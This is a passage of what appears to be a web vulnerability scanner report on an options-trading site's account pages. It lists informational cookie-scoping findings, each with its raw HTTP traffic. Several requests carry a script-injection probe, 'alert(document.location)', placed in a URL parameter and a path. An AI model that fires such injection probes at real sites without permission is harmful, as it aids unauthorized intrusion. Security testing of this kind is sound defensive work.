ETag: "80a3e3774840c91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a2.&....]...........{........6b|........................P}.U..........................l....................Iv.........................Ly..........z...........z....................................
...[SNIP]...

9.13. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_ox.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_ox.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 3698
Content-Type: image/gif
Last-Modified: Thu, 01 Sep 2011 04:00:28 GMT
Accept-Ranges: bytes
ETag: "1f1382af5b68cc1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A07AAAC644F53C5E640E80A0791B83B0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

GIF89a..8..@....q.k.........ZWX....r.M.E#. .........e.^...Y.R.....................@..}.w............... |...............0..P.....`..1-....LIJ?;<...............p........hef........................vstA
...[SNIP]...

9.14. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:33:31 GMT; path=/
Set-Cookie: TLTHID=67AC9231459F78416C6C118417F2EB5D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:31 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.15. https://account.optionsxpress.com/images/minus_new_acct.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/minus_new_acct.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/minus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 176
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:32 GMT
Accept-Ranges: bytes
ETag: "60a375ba375c51:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=82FCEE1D43C306252438F6B0E9A0C596; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@.-`..$...(FC.V. ..h,....z..D.@T`F....0XF.Iazi.B.;

9.16. https://account.optionsxpress.com/images/newaccount/account_select1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select1.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/newaccount/account_select1.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 19995
Content-Type: image/gif
Last-Modified: Mon, 16 May 2011 14:51:10 GMT
Accept-Ranges: bytes
ETag: "d7b82ab2d813cc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=74CA95F24DB951FC9D2261975F73498E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a........................................................................................................................................................................................}.........
...[SNIP]...

9.17. https://account.optionsxpress.com/images/newaccount/account_select2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/account_select2.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/account_select2.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 8859
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:17 GMT
Accept-Ranges: bytes
ETag: "e09b2bff31f1ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=57018DB34D660B4883F443A4D0B4D349; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:28 GMT

GIF89a............u..x............nK6.......................wnYG.W8..g..|.yZ.vW.......e\......[0.wdQ.........lki.]B..e......ZUN..}.............fG.xh.jI.|^................W<..l.........................
...[SNIP]...

9.18. https://account.optionsxpress.com/images/newaccount/nap_error_icon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_error_icon.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_error_icon.png HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 385
Content-Type: image/png
Last-Modified: Thu, 28 Oct 2010 18:35:54 GMT
Accept-Ranges: bytes
ETag: "b848a2f4ce76cb1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2AB1B991426954C9E6064DB17C6FCAD0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

.PNG
.
...IHDR.............Q(......tEXtSoftware.Adobe ImageReadyq.e<...#IDATx.b...?..01@...b....ed......$r..D......P.. . ..z..(S.R
..6>.Y......@z........n....@J.I..P.S&..O..1..'.^........@.@.a:..@
...[SNIP]...

9.19. https://account.optionsxpress.com/images/newaccount/nap_tip_icon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/newaccount/nap_tip_icon.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/newaccount/nap_tip_icon.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 329
Content-Type: image/gif
Last-Modified: Tue, 11 May 2010 17:47:16 GMT
Accept-Ranges: bytes
ETag: "70e98fe31f1ca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=991AE206424B97B6F977F9B28BE347B2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

GIF89a.............f..q..Wy.Vu.W{.T~....W|..........Z..g..X..X.Wx.Vv.......V.}.....e........_..R|...................Ny................................................................................
...[SNIP]...

9.20. https://account.optionsxpress.com/images/openAccount_bottom.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/openAccount_bottom.jpg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/openAccount_bottom.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 892
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:33 GMT
Accept-Ranges: bytes
ETag: "30977b4583f0ca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0E746D3A46A028879E86A893334AE28A; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky..............Adobe.d.........................#....#"....."'.#!!#.''.030.'>>AA>>AAAAAAAAAAAAAAA................!....!1!!$!!1>-''''->8;333;8AA>>AAAAAAAAAAAAAAAAA...........
...[SNIP]...

9.21. https://account.optionsxpress.com/images/plus_new_acct.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/plus_new_acct.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/plus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 178
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:17 GMT
Accept-Ranges: bytes
ETag: "b0e14052a375c51:fb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=D7A2A4EA4D6B84512DA39A9BEE64DA2F; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

GIF89a    .    ....................................................................................................!.......,....    .    .@./`..$...(BB.N. .r1..#4...@T"Q........(....B.J....;

9.22. https://account.optionsxpress.com/images/rightColumn_divider.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/rightColumn_divider.jpg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/rightColumn_divider.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 624
Content-Type: image/jpeg
Last-Modified: Mon, 10 May 2010 20:56:06 GMT
Accept-Ranges: bytes
ETag: "40c45d3583f0ca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=8FAC75CE47AFCEB5B19049BC92732706; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

......JFIF.....d.d......Ducky.......1.....!Adobe.d...........    .......%...n..................................................%$$$%)))))))))).    ..    
   .

........................................##"##))
...[SNIP]...

9.23. https://account.optionsxpress.com/images/styles/bubble/b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/b.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/b.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 95
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f0c783bc1bfcca1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=77A51C33434FCC2754ED389A537B984E; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.LLL...ccc.................................!.......,.............Ii...q
.H..;

9.24. https://account.optionsxpress.com/images/styles/bubble/bl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/bl.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/bl.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 1197
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "50b284bc1bfcca1:fd0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E4CCE9D34E711E38DE7ADA84B79732F8; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a...........f.......MMM...............___YYY...............PPP.i....www.........qqq......}}}TTT....s................~~~JJJ...ccc..............i....u...........z"....{#..2HHH........F....j........
...[SNIP]...

9.25. https://account.optionsxpress.com/images/styles/bubble/br.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/br.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/br.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 366
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "203d84bc1bfcca1:eb2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=956B761F4FA5D2BDCA16DB89838483FB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:49 GMT

GIF89a
....1.....f.......ddd..................iii.................................rrr...eee.....................VVV...hhh..^.\.._.W.uN5.c    LLL|V<PPP....a.MMM...........................................
...[SNIP]...

9.26. https://account.optionsxpress.com/images/styles/bubble/l.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/l.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/l.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "f05681bc1bfcca1:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=66E456154210275BF1AD2294C24E11C3; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a...........f.......!.......,.............'.....;

9.27. https://account.optionsxpress.com/images/styles/bubble/r.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/r.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/styles/bubble/r.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=08CFF1D64FFA1C27A2F8DA9B12382380

Response

HTTP/1.1 200 OK
Content-Length: 65
Content-Type: image/gif
Last-Modified: Tue, 25 May 2010 15:05:39 GMT
Accept-Ranges: bytes
ETag: "d0881bc1bfcca1:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4F0588BA4BA85289A097B6894C4CDEEB; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:50 GMT

GIF89a
..........f.............ddd...!.......,....
........aSD$.;

9.28. https://account.optionsxpress.com/images/styles/bubble/t.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/styles/bubble/t.gif

Issue detail

